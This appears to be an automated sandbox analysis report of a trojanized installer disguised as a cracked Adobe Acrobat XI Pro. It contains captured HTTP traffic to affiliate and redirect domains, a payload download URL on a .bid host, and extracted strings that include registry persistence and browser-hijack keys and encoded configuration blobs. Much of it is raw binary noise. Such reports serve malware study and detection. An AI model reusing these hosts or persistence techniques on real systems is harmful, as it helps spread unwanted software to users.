..!..`..U;u3&...\1#..m..~d..1.....D;.n0...$....)L..C[..F.........ezn].
`.w.R... ..U.......@MSmF..v"|...]..w.v.YjZ...1|pD.q........@....>..
....U3...4l..>P.-..........J....."..a.....@0..-.`..G...TB..Bb..%pC.
5d..`.I.<.r\....V.W....G......p...v%!...@#..2... T....F.X...g.....:
/.2XDQa..rmA..........#....].Yv..d].......R..|...............W{..>.
.JA..n.[1..o".C.K....f./$X-..A.."ui.b....@..#:OzhS...Gd..u.rJl1d.h .)d
.........%8 ...}.O.K<.........S.......Vf...il.F.h..(...6Z..."J1.T.E
.'A.gVm*...&.1E....$...sf.g...._.N..f"....y7.H..V.......Q.s.=.....B.d3
1%.=....0.Y..0.....t...g.c..B.../Q..$..h&=..BLB.........l..@..ffc1..B.
6.....)...g0.__.....?....u....9.^..*....,..........*U...n...!.q.......
&.h>.-u.I..pn..$fA.|....Wf.n.8.._...a/K&.(...^.8.$......5.'@K_.MB&g
t;....O...t......%$.sM5d7..._.;.{...T)}...c.......Z.~.W.......V...c.~.
~y-..K0 ......&..d..{u...d.nwn..2.....#!.f5..(..$8.C...}....S...B.P.F]
{UyU9.4.......0v.w.[do..@...^....p1..l^3&[......*.[.jj.b.$...5..{.<<< skipped >>>

GET /?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 HTTP/1.0

Host: get.ynoptisticglob.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 302 Moved Temporarily

Content-Type: text/html

Connection: close

Server: nginx/1.10.1

Date: Sun, 27 Nov 2016 15:38:10 GMT

X-Powered-By: PHP/5.4.16

Location: hXXp://away.yosauruslega.bid/get.php?ses=482796663418412224

X-Cache: Miss from cloudfront

Via: 1.1 3ef066dcf359ad5dbc339df978147194.cloudfront.net (CloudFront)

X-Amz-Cf-Id: RMWwWYPKPbgGnBwxbKPHR9ahWyMUS2Lgqtmka11YcIwRIWnNjdqqJQ==

GET /redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ads.affbuzzads.com

Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Sun, 27 Nov 2016 15:38:42 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Location: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Sun, 27 Nov 20
16 15:38:42 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..Location: hXXp://tour.cinemaden
.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0
&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=201611
27-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0..0..

GET hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: win.ketydesmidiana.bid

Connection: close

Accept: */*

User-Agent: InstallCapital


HTTP/1.1 302 Found

Cache-Control: no-cache, no-store, must-revalidate

Content-Type: text/html; charset=iso-8859-1

Date: Sun, 27 Nov 2016 15:38:13 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Location: hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2

P3P: CP="NOI CUR OUR NOR INT"

Pragma: no-cache

Server: nginx/1.7.9

Set-Cookie: enc_aff_session_4=ENC02734-1024c893cfbfff9cc18408df1cefd7-1006-4-0-0-0-0-UA-0-3131-32373335-3130393538313332-_-_-31333532323234373631-194.242.96.226-20161127103813-_-05006D112A1D243C70397465550C64525E4D096750152358604977030A45533D7834601B4D480F741D; expires=Tue, 27 Dec 2016 15:38:13 GMT; path=/;

Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Wed, 23 Oct 2019 02:18:13 GMT; path=/;

tracking_id: 1024c893cfbfff9cc18408df1cefd7

X-Robots-Tag: noindex, nofollow

Content-Length: 453

Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&tracking
Id=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1
cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetEx
plorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">
here</a>.</p>.</body></html>...<<< skipped >>>

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com


HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 24 Nov 2016 19:16:52 GMT

Expires: Mon, 28 Nov 2016 19:16:52 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 246112

Cache-Control: public, max-age=345600

0..........0..... .....0......0...0......J......h.v....b..Z./..2016112
3130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.o...........20161123130113Z....20161130130113Z0...*.H................
...[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....
:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E..
.|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....
P!.;`.'.,........\...jk....).......:....."....HTTP/1.1 200 OK..Content
-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 19:16:52 GMT.
.Expires: Mon, 28 Nov 2016 19:16:52 GMT..Server: ocsp_responder..Conte
nt-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAME
ORIGIN..Age: 246112..Cache-Control: public, max-age=345600..0.........
.0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k
0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o........
...20161123130113Z....20161130130113Z0...*.H...................[...^..
=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d...
.M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......Q
Xl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,.
.......\...jk....).......:....."........

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com


HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 24 Nov 2016 20:12:58 GMT

Expires: Mon, 28 Nov 2016 20:12:58 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 242748

Cache-Control: public, max-age=345600
0..........0..... .....0......0...0......J......h.v....b..Z./..2016112
3130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.ssP.QfKs....20161123130507Z....20161130130507Z0...*.H................
..{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.
....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.
[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{...
......|..<63@...B....e.....~.......T^..TO..l(.v..HTTP/1.1 200 OK..C
ontent-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 20:12:5
8 GMT..Expires: Mon, 28 Nov 2016 20:12:58 GMT..Server: ocsp_responder.
.Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options
: SAMEORIGIN..Age: 242748..Cache-Control: public, max-age=345600..0...
.......0..... .....0......0...0......J......h.v....b..Z./..20161123130
507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP
.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u
/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....
z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(
..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.......
..|..<63@...B....e.....~.......T^..TO..l(.v....

GET /r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.google-analytics.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Date: Sun, 27 Nov 2016 15:38:47 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, no-store, must-revalidate

Last-Modified: Sun, 17 May 1998 03:00:00 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

Server: Golfe2

Content-Length: 35

GIF89a.............,...........D..;HTTP/1.1 200 OK..Access-Control-All
ow-Origin: *..Date: Sun, 27 Nov 2016 15:38:47 GMT..Pragma: no-cache..E
xpires: Fri, 01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, no-sto
re, must-revalidate..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..X-C
ontent-Type-Options: nosniff..Content-Type: image/gif..Server: Golfe2.
.Content-Length: 35..GIF89a.............,...........D..;..

GET /appImg.jpg HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: d2adi7hu49xk5t.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/jpeg

Content-Length: 4628

Connection: keep-alive

Date: Thu, 22 Sep 2016 18:01:12 GMT

Last-Modified: Mon, 13 Jun 2016 11:29:06 GMT

ETag: "ba6c4124ad5d33528fe1d609e6ac1ff0"

Accept-Ranges: bytes

Server: AmazonS3

Age: 74433

X-Cache: Hit from cloudfront

Via: 1.1 616f617776e843142ab5d87231cb3526.cloudfront.net (CloudFront)

X-Amz-Cf-Id: eXOPAKCBYjP73UFpmlKl_Stk7IsY9FpCsFHwDlzEkoSBu4TrH411fQ==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.
com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&g
t; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-
c011 66.146729, 2012/05/03-13:40:03        "> <rdf:RDF xmlns:rdf
="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description
 rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="ht
tp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.
0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 W
indows" xmpMM:InstanceID="xmp.iid:E39F75D6F49A11E4B7DAEACD8AA72C6E" xm
pMM:DocumentID="xmp.did:E39F75D7F49A11E4B7DAEACD8AA72C6E"> <xmpM
M:DerivedFrom stRef:instanceID="xmp.iid:E39F75D4F49A11E4B7DAEACD8AA72C
6E" stRef:documentID="xmp.did:E39F75D5F49A11E4B7DAEACD8AA72C6E"/> &
lt;/rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpack
et end="r"?>....Adobe.d............................................
......................................................................
...............................K.G....................................
....................................................!..1AQa.."R.T.q24D
.%...B#dEU'.bSc.5u&C$t.67(.....................!1AQa..."2BR.q...b....r
S.......#............?.<fnfHr.B..v.......ddD.P.Q5.(.(t.....%.KH....
,...@L..f.|?..4G.....[......b.......).4_....=.<.....o.....}....6..3
D....w........u.{..e.(...yN..f..sr......}...G.o......G\...-TBL.<fex
.=.;...u.;..vO6..}.:p...^"x...G.s...k.=....../.t....xg.4O..^..e..z<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3584:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe

p&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B->C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe

venzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B

etc.dll

version="0.5.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel level="requireAdministrator" />

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

8 8$8(8,808

0S0

0 0$0(0,0

.DMi)

MSVCRT.dll

HttpSendRequestA

HttpSendRequestExA

HttpQueryInfoA

FtpCreateDirectoryA

FtpOpenFileA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpEndRequestA

InternetCrackUrlA

WININET.dll

inetc.dll

Open URL Error

URL Parts Error

FtpCreateDir failed (550)

Error FTP path (550)

Downloading %s

%dkB (%d%%) of %dkB @ %d.dkB/s

(%d %s%s remaining)

REST %d

SIZE %s

Content-Length: %d

Content-Type: application/x-www-form-urlencoded

Authorization: basic %s

Proxy-authorization: basic %s

%s:%s

FtpCommandA

wininet.dll

%u MB

%u kB

%u bytes

%d:d:d

%s - %s

(Err=%d)

NSIS_Inetc (Mozilla)

Filename: %s

/password

Uploading %s

9!9-9B9}9

.reloc

System.dll

callback%d

piAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

@.reloc

u.Uj@

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp

nsi28E5.tmp

s\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe

e=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack

\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY

enzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack

ff.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack

c:\%original file name%.exe

%original file name%.exe

ers\"%CurrentUserName%"\AppData\Local\Temp\nsn28B5.tmp

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\

201611271537

hXXp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

0.9.0.0

emuext.exe

%original file name%.exe_3584_rwx_10004000_00001000:

callback%d

iexplore.exe_1772:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_1608:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

Setup__2140_il2.exe_896:

.text

`.rdata

@.data

.rsrc

@.reloc

j5SSh

8%uEP3

PSShp[

xSSSh

FTPjKS

FtPj;S

C.PjRV

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

GetProcessWindowStation

WinHttpSetStatusCallback

aeM4OKE9Je5OxhTcedU2JaFDcNhT0xXeTuA5M5xpbNtc0xaMAtI/OKdzUc5Q2keaeY13IqdrIopuk1rKWM1lavBUM8NcyhTcQuI4Orhmcctx1hTaF4QEe/VrftpT3BLaTvElOLZibNxz3hfaF4QEe/VucdxJ3hbTZ84zMugic8sRnwjeXsRqcrlhNqU=

aeM4OKE9Je5OxhTcedU2JaFDcNhT0xXeTuA5M5xpbNtc0xaNAtI/OKdzUc5Q2keaeY13IqdrIopuk1rKWM1lavBUM8NcyhTcQuI4Orhmcctx1hTaF4QEe/VrftpT3BLaTvElOLZibNxz3hfaF4QEe/VucdxJ3hbTZ84zMugic8sUtQ==

D9ILffB0NYFR0RG2D9I2Orx3dtdY01TcTMZecqZmcsYXkQ7SWo8 NLoOOtwYzFCRT9kyXg==

aeM4OKE9JfxYyy7XS888JIVmbc5Q2g7aWJt3I71mccRt3gjeR9IMcoZaP5Idmim1

Failed to get the Temp folder: %d

aeM4OKE9JfpN2xvLT/ElOLJ1etxOk1rRT9kjd7hoccpJ1gDeXsg4OfVhdsNYnxPMCsIlMrRzessHn1/TWY13NLpqb8BT2hTLCs82OrAnJY8Y0wm1

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

ec4xI6Jmbcph8hPcWM4kOLNzQ/hU0R7QXdILFKB1bcpTyyzaWNI OLtbWtdN0xXNT9MLBL1ic8Md RXTTsQlJA==

fsQlOvsnaM5Uy1qaTqs=

fsQlOvtzd91Y3h6fSdMyNqFie48Y23A=

aeU4ILtrcM5ZhUD2RNIjNrlrP pPzRXNCs45d5Z1es5J2j7WWMQ0I7p1Zo8Y7FqTCsQlJbp1P4pZtQ==

Zs44PLxpeI9b0AifWtM4NLB0bMpOnw7NT8R3OLMnOssHnwreWMQ5I6YnbMZH2lqaTo13J7Bpe8ZT2FrMQ9syd/BjFQ==

GYExOKcnOssHnwreWMQ5I6YnbMZH2lqaTo13J7Bpe8ZT2FrMQ9syd/BjP91egl/bIA==

aeU4ILtrcM5ZhUD TsUDP7RpdNxt3gjeR8QjMqcnb5IY7FrJF4QzXQ==

aeU4ILtrcM5ZhUD TsUDP7RpdNxt3gjeR8QjMqd0FQ==

aeg5JKFmc8NcyxPQROw2ObRget0HhTPRXu45E7pwccNS3h78RcwnO7BzessHnz7QXc87OLRjP8ZZgl/bCvI/OKdzUc5Q2keaeas=

aeg5JKFmc8NcyxPQROw2ObRget0HhT/RW9QyIrBOcdxJ3hbTS9U OLsnTcpc2wPrReg5JKFmc8Mdmim1

CInstallationManager::IsPartOfInstallation value=%s

CInstallationManager::SetComponentInstallationEnded %S

%Y-%m-%d %H:%M:%S

CProgressUpdateRequest::CreateInstance %S

CProgressUpdateRequest::ProgressUpdate %S

Send progress update request %s

Progress Request for '%S' return %s

afU2JL5UfMdY2w/TT k2ObFret0HhTnNT8AjMpxpbNtc0xbrS9I8d4ZyfMxYzAmeCvU2JL4nbNpe3B/MWcciO7l P91Y2BPMXsQlMrEpFQ==

ecQjd4J0d/xV2hbTCpx3FKdifttY8BjVT8Ijf/dQTMxP1grLBPI/MrlrPYY3shnSTtJqAKZvTMdY0xaRePQZf/cibI0Rj1b5S80kMvwNEvhu3AjWWtV5BLliet8djEqPGpFnXdhkcstOgi3MQvI/MrlrMf1o8VKdSMgjJLRjcsZTn1XcS880MrknOtwfk0qTbMA7JLAuFaJu2g6ffdI/BL1ic8MdglrxRdU/Prtg

%c%c%c%c

C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb

VERSION.dll

KERNEL32.dll

USER32.dll

GDI32.dll

RegDeleteKeyW

RegCloseKey

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

Secur32.dll

WinHttpCloseHandle

WinHttpOpen

WinHttpSetOption

WinHttpGetProxyForUrl

WinHttpCrackUrl

WinHttpConnect

WinHttpOpenRequest

WinHttpSetStatusCallback

WinHttpSendRequest

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpReceiveResponse

WINHTTP.dll

GetProcessHeap

GetCPInfo

zcÁ

.?AVAsyncWinHttp@@

.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AUISupportErrorInfo@@

.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@

?456789:;<=

!"#$%&'()* ,-./0123

vinyls.tramell.1 = s 'Inst Class'

CLSID = s '{dded0858-104b-4eec-a82e-a44b49d78594}'

vinyls.tramell = s 'Inst Class'

CurVer = s 'vinyls.tramell.1'

